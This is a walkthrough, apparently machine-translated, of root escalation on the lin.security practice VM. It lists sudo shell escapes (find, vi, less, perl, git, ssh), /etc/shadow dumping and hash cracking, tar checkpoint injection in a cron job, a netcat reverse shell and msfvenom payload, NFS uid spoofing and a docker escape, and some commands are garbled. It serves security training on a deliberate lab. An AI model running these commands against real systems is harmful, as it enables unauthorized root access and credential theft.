Target description: in.security, we hope to develop a Linux virtual machine, which is based on the latest Ubuntu distribution (18.04 LTS) when writing this article, but there are many vulnerabilities that make it impossible for users to upgrade and take root in the box. Designed to help understand that some built-in applications and services (if incorrectly configured) can be abused by attackers.
First, you can log in to the host using the following credentials: bob / secret
Download address: https://in.security/downloads/lin.security_v1.0.ova
Environment configuration:
1. Because the security target directly powered on is connected to the NAT, it cannot obtain the ip, so shut down again, press and hold the shift key for the first second of power on, and then press e to enter the configuration interface:
Change ro to rw signie init=/bin/bash
2. Press ctrl+X or F10 to restart. After restarting, the network card is ens33:
3. At this time, you need to modify enp0s3 to ens33, apply after modification, and restart:
Ubuntu starts at 16.04, although / The configuration of fixed IP can also be modified in etc/network/interfaces, but multiple network cards are used Netplan mode. The configuration file is: / etc/netplan/50-cloud-init.yaml
vim /etc/netplan/50-cloud-init.yaml netplan apply //Configuration application takes effect
4. If not, modify the configuration in / etc/network/interfaces:
vim /etc/network/interfaces Add two new lines: auto ens33 iface ens33 inet dhcp
1, Information collection
1. Scan port, open port 22, and perform remote login according to the given account:
nmap -sS -sV -T5 -p- 192.168.225.192 ssh [email protected]
2, sudo rights
2. There are many loopholes in the target, so there are many methods to raise the right:
1) General method: sudo -l view the commands that support root privileges
Many commands can be entered for authorization:
sudo ash sudo bash sudo /bin/bash sudo dash sudo csh sudo sh sudo curl sudo zsh
2) socat Rights:
Establish a shell on port 1234 on the server
sudo socat tcp-listen:1234,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane
Open another window for remote connection and start the local 1234 port LISTEN on the local machine:
socat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:1234
Reference article: https://blog.csdn.net/qq_17204441/article/details/89324620
3) awk Rights:
sudo awk 'BEGIN '
4) Right of withdrawal:
The ed command is used to start the ed text editor. Use the ed command to access the empty buffer to call the bash/sh shell to raise the right.
sudo ed !sh
There is a problem here. Exit cannot exit. You need to use w to save and q to exit:
5) find command authorization:
sudo find . -exec /bin/sh \; -quit
6) env environment variable authorization:
Some applications use functions such as system to call system commands, but instead of using the absolute path, they use the env command to find the environment variables, which may be upgraded by modifying the environment variables
sudo sh -c 'cp $(which env) .; chmod +s ./env' ./env /bin/sh -p
7) less, more and man claim:
sudo less /etc/passwd !/bin/sh sudo more /etc/passwd !/bin/sh Sudo man man !/bin/sh
8) expect Rights:
expect is an automated interactive suite, which is mainly used when executing commands and programs. The system requires the input of specified strings in the form of interaction to realize interactive communication.
sudo expect -c "spawn /bin/sh;interact"
9) scp Rights:
TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y:
sudo pico ^R^X reset; sh 1>&0 2>&0
10) ssh authorization:
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
11) vi Rights:
sudo vi -c ':!/bin/sh' /dev/null
12) pico Rights:
sudo pico ^R^X reset; sh 1>&0 2>&0This operation method: press and hold ctrl+r and ctrl+x on the keyboard, and then execute the following commands. After execution, press and hold ctrl+r and ctrl+x again, and then enter the command to be executed, such as id, and it will be executed with root permission
13) rvim Rights:
sudo rvim -c ':python3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
14) perl Rights:
sudo perl -e 'exec "/bin/sh";'
14) tclsh Rights:
Tcl is a scripting language and a string based command language
sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
15) git Rights:
sudo git -p help config !/bin/sh
16) Right of withdrawal:
sudo script -q /dev/null
3, Password information collection and authorization
hash burst:
1. If you check / etc/passwd, you can find something like root:x:0:0:root:/root:/bin/bash. In this case, x means that the password hash of the user is stored in / etc/shadow
2. Try to blow up the password of insecurity: (the dictionary is in usr/share/wordlists/rockyou.txt of kali)
hashcat AzER3pBZh6WZE -m 1500 rockyou.txt
john blasting:
1. Query suid authorization raising command:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
xxd right raising:
The xxd command can make a hexadecimal output for a given standard input or file, and it can also convert the hexadecimal output to the original binary format. When suid is used together with execution permission, it will cause authorization lifting
1. First view the group information and find that user susan belongs to itservices user group:
cat /etc/group | grep itservices
2. Use the super user to view the hidden file, find the secret under susan's account, view it, and get the password:
find / -name ".*" -type f -path "/home/*" -exec ls -al {} \;
3. Use MySuperS3cretValue! Log in to the susan account with the password and use the xxd command to read the / etc/shadow file:
xxd "/etc/shadow" | xxd -r
4. Copy the user and password into the document, and use the john command to blow up the password:
john --wordlist=/usr/share/wordlists/rockyou.txt pass
taskset authorization:
taskset 1 /bin/bash -p
4, Scheduled task cron authorization:
1. Generate a rebound shell payload on kali:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.225.133 lport=1234 R
2. Write the payload to the sh file of the scheduled task:
echo "mkfifo /tmp/jagoff; nc 192.168.225.133 1234 0</tmp/jagoff | /bin/sh >/tmp/jagoff 2>&1; rm /tmp/jagoff" > shell.sh && chmod +x shell.sh echo "" > "–checkpoint-action=exec=sh shell.sh" //Inject a flag that specifies the checkpoint action echo "" > --checkpoint=1 //Inject a flag to specify our checkpoint
3. Open another window, log in remotely again, listen, and bounce the shell successfully
5, NFS Rights:
1. When scanning the port, it is found that NFS port is open: 2049. View the mounting location:
showmount -e 192.168.225.192
2. Mount:
mount -t nfs 192.168.225.192:/home/peter /tmp/
When you see root, you can directly access the root directory, but you can't copy files directly to the network shared directory.
3. The principle is: mount the NFS share on Kali, create a new user with the same uid/gid as the export (1001 / 1005), and then log in to the user to write the export file
groupadd -g 1005 peter adduser peter -uid 1001 -gid 1005 ls -al /tmp
4. Switch the peter user, create an ssh key to connect, and access / home/peter on Lin.security:
ssh-keygen
5. Because the file can be written, the ID_ Copy rsa.pub content to authorized_keys, and then put them in the mounted directory, 644 or 600
cat id_rsa.pub > /tmp/authorized_keys chmod 700 ../.ssh/ chmod 600 chmod 600 authorized_keys
6. Remote connection:
ssh -i id_rsa [email protected]
7. After successful connection, use strace to claim:
strace can track the system call generated by a process, including parameters, return value and execution time.
sudo strace -o /dev/null /bin/sh
Or docker group rights:
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease